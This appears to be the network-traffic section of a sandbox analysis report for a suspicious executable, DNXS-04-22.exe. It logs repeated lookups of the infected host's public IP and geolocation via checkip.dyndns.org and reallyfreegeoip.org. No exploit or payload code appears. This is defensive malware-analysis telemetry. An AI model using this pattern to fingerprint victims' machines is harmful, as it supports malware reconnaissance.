May 2, 2024 08:00:25.000273943 CEST	275	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 06:00:24 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.225</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49715	193.122.130.0	80	7264	C:\Users\user\Desktop\DNXS-04-22.exe

Timestamp	Bytes transferred	Direction	Data
May 2, 2024 08:00:25.525721073 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
May 2, 2024 08:00:25.635040045 CEST	275	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 06:00:25 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.225</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49717	193.122.130.0	80	7264	C:\Users\user\Desktop\DNXS-04-22.exe

Timestamp	Bytes transferred	Direction	Data
May 2, 2024 08:00:26.154671907 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
May 2, 2024 08:00:27.696715117 CEST	275	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 06:00:27 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.225</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49719	193.122.130.0	80	7264	C:\Users\user\Desktop\DNXS-04-22.exe

Timestamp	Bytes transferred	Direction	Data
May 2, 2024 08:00:28.958559036 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
May 2, 2024 08:00:29.665608883 CEST	275	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 06:00:29 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.225</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49721	193.122.130.0	80	7264	C:\Users\user\Desktop\DNXS-04-22.exe

Timestamp	Bytes transferred	Direction	Data
May 2, 2024 08:00:30.235372066 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
May 2, 2024 08:00:31.349513054 CEST	275	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 06:00:31 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.225</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49723	193.122.130.0	80	7264	C:\Users\user\Desktop\DNXS-04-22.exe

Timestamp	Bytes transferred	Direction	Data
May 2, 2024 08:00:32.069479942 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
May 2, 2024 08:00:32.178241968 CEST	275	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 06:00:32 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.225</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49711	104.21.67.152	443	7264	C:\Users\user\Desktop\DNXS-04-22.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 06:00:21 UTC	87	OUT	GET /xml/191.96.150.225 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-05-02 06:00:21 UTC	702	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 06:00:21 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 505 Last-Modified: Thu, 02 May 2024 05:51:56 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iR4247YtERVLcGaqC9tymzkraloV7fIc4uqTdpaF1kcpGHCwhNX9g9keOykoJaSrjnn4gbbJNhuWV%2FbNGyAtLuR73OFxtaU0DzztsQM2JaUqzGjZW7IOY2I2p6C5uLxQFkJsax%2Bv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87d5ca5c3fe1423e-EWR alt-svc: h3=":443"; ma=86400
2024-05-02 06:00:21 UTC	369	IN	Data Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 49 4c 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 49 6c 6c 69 6e 6f 69 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 43 68 69 63 61 67 6f 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 36 30 36 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 Data Ascii: 16a<Response><IP>191.96.150.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
2024-05-02 06:00:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49712	104.21.67.152	443	7264	C:\Users\user\Desktop\DNXS-04-22.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 06:00:23 UTC	63	OUT	GET /xml/191.96.150.225 HTTP/1.1 Host: reallyfreegeoip.org
2024-05-02 06:00:23 UTC	702	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 06:00:23 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 507 Last-Modified: Thu, 02 May 2024 05:51:56 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KdaZiKDScYHzh2zR1R5A0qrZ66OJ9oN9eFyKATRhDldpf0gxTibMQXKqiysT6NtHWGp030PcTPlSxNVdEzjIXrf8u4Cp%2FzGUNhfnuUnmc03L%2BsnR1WvexbYGy7yWblZO0CibOmPL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87d5ca6c3f987d20-EWR alt-svc: h3=":443"; ma=86400
2024-05-02 06:00:23 UTC	369	IN	Data Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 49 4c 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 49 6c 6c 69 6e 6f 69 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 43 68 69 63 61 67 6f 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 36 30 36 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 Data Ascii: 16a<Response><IP>191.96.150.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
2024-05-02 06:00:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49714	104.21.67.152	443	7264	C:\Users\user\Desktop\DNXS-04-22.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 06:00:25 UTC	63	OUT	GET /xml/191.96.150.225 HTTP/1.1 Host: reallyfreegeoip.org
2024-05-02 06:00:25 UTC	710	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 06:00:25 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 509 Last-Modified: Thu, 02 May 2024 05:51:56 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wYnDR4RxtVMUCqov6o0g1UXTWuqG3rElyt2E%2BrRKXm24qdSxvFrV3sOUMu5PbChdn%2B4j5wJXOlkxyT6S6IhQe6RDV1A8pLZkvUAEABXW9Hdx%2FkDoHcc7xeP0Qw%2Fl%2BVD0jny7FGg%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87d5ca7678e943aa-EWR alt-svc: h3=":443"; ma=86400
2024-05-02 06:00:25 UTC	369	IN	Data Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 49 4c 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 49 6c 6c 69 6e 6f 69 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 43 68 69 63 61 67 6f 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 36 30 36 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 Data Ascii: 16a<Response><IP>191.96.150.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
2024-05-02 06:00:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49716	104.21.67.152	443	7264	C:\Users\user\Desktop\DNXS-04-22.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 06:00:25 UTC	87	OUT	GET /xml/191.96.150.225 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-05-02 06:00:26 UTC	702	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 06:00:25 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 509 Last-Modified: Thu, 02 May 2024 05:51:56 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8D4%2FQj2ogdfMGx6BOvExOS5IpLJ1CNKRnandqbhuNoPVu2vIR8Ub3bcviGqtvjj9NeciOceClNXxelQ6nlhc0VexYD%2F8Eme3dL9967CDyPtiXtisWNNKIzlRn58fpNMO8ZD2ssYc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87d5ca7a69f941d8-EWR alt-svc: h3=":443"; ma=86400
2024-05-02 06:00:26 UTC	369	IN	Data Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 49 4c 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 49 6c 6c 69 6e 6f 69 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 43 68 69 63 61 67 6f 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 36 30 36 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 Data Ascii: 16a<Response><IP>191.96.150.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
2024-05-02 06:00:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49718	104.21.67.152	443	7264	C:\Users\user\Desktop\DNXS-04-22.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 06:00:28 UTC	63	OUT	GET /xml/191.96.150.225 HTTP/1.1 Host: reallyfreegeoip.org
2024-05-02 06:00:28 UTC	710	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 06:00:28 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 512 Last-Modified: Thu, 02 May 2024 05:51:56 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J5xzV7lbHb2iK8NsUid%2BKvXnESVMkvEjm9ojWfhsI0lTnb1ShRPjuHj3URd0J%2FwnNK32I0Hw0%2B%2FducsW%2BaP22IgSmNbXlQqkM0uSrf1bbcLZITfBmd40l28LxOG%2F3XaL8SSkdn8y"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87d5ca8be8c843ab-EWR alt-svc: h3=":443"; ma=86400
2024-05-02 06:00:28 UTC	369	IN	Data Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 49 4c 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 49 6c 6c 69 6e 6f 69 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 43 68 69 63 61 67 6f 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 36 30 36 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 Data Ascii: 16a<Response><IP>191.96.150.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
2024-05-02 06:00:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49720	104.21.67.152	443	7264	C:\Users\user\Desktop\DNXS-04-22.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 06:00:29 UTC	87	OUT	GET /xml/191.96.150.225 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-05-02 06:00:30 UTC	704	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 06:00:30 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 514 Last-Modified: Thu, 02 May 2024 05:51:56 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UF6URGv8TlHoZhGZiZ3H4K45gdkkmw2fXOVApcA10u311mItF8wKSCcJed%2FPIKi09GenUTG6WUZUf6ExlkxPck6qkwTR98%2FNhFNj%2F8D0tkw3Twoz6LLSW6FgWa9YyR4kUruu6U20"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87d5ca93afe75e65-EWR alt-svc: h3=":443"; ma=86400
2024-05-02 06:00:30 UTC	369	IN	Data Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 49 4c 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 49 6c 6c 69 6e 6f 69 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 43 68 69 63 61 67 6f 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 36 30 36 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 Data Ascii: 16a<Response><IP>191.96.150.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
2024-05-02 06:00:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49722	104.21.67.152	443	7264	C:\Users\user\Desktop\DNXS-04-22.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 06:00:31 UTC	63	OUT	GET /xml/191.96.150.225 HTTP/1.1 Host: reallyfreegeoip.org
2024-05-02 06:00:31 UTC	710	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 06:00:31 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 515 Last-Modified: Thu, 02 May 2024 05:51:56 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TBRCpGrLqPWWH8lPU%2BXXu9LhfIf5mYI7d9CmjzE%2BJ%2FGdfbo4IxU5nvu0Xenew7w9wp1yRP%2FAnaskExwVz4twfZa62xvdMri%2FIE3Ift9KHo2NCSfpnKIdSysNbLlFUa%2FdVuTxBbeH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87d5ca9f3b3317b1-EWR alt-svc: h3=":443"; ma=86400
2024-05-02 06:00:31 UTC	369	IN	Data Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 49 4c 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 49 6c 6c 69 6e 6f 69 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 43 68 69 63 61 67 6f 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 36 30 36 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 Data Ascii: 16a<Response><IP>191.96.150.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
2024-05-02 06:00:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49725	104.21.67.152	443	7264	C:\Users\user\Desktop\DNXS-04-22.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 06:00:32 UTC	63	OUT	GET /xml/191.96.150.225 HTTP/1.1 Host: reallyfreegeoip.org
2024-05-02 06:00:32 UTC	700	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 06:00:32 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 516 Last-Modified: Thu, 02 May 2024 05:51:56 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TSZcC1i8Ya%2Fr6ZbKIZ4tm2nOlIwEp1ddKXu54RGBRCCjat06T8JIVAIItny8v5O0JTCKaCCy6WsBVsrO9XHqEgAv7LfWd3DlZnHShXXsqHLkFhKW2vNfsACm65gGS8y4OoGK9aEZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87d5caa36be14401-EWR alt-svc: h3=":443"; ma=86400
2024-05-02 06:00:32 UTC	369	IN	Data Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 49 4c 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 49 6c 6c 69 6e 6f 69 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 43 68 69 63 61 67 6f 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 36 30 36 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 Data Ascii: 